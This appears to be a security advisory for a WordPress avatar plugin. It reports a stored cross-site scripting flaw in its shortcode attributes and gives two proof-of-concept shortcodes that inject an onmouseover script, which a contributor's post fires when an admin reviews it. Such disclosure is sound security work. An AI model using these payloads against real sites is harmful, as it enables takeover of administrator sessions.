Description The plugin does not properly sanitize and escape certain of its shortcodes attributes, which could allow relatively low-privileged users like contributors to conduct Stored XSS attacks.
As a Contributor+ create a new post and add one of the following shortcode.
[avatar user="admin" size="96" align="left" link='" onmouseover="alert(/XSS/)"' /]
[avatar user="admin" size="96" align="left" link="/" target='" onmouseover="alert(/XSS/)"' /]
Save it to be reviewed.
When an admin reviews the post and moves the mouse over the added code, the payload will be delivered.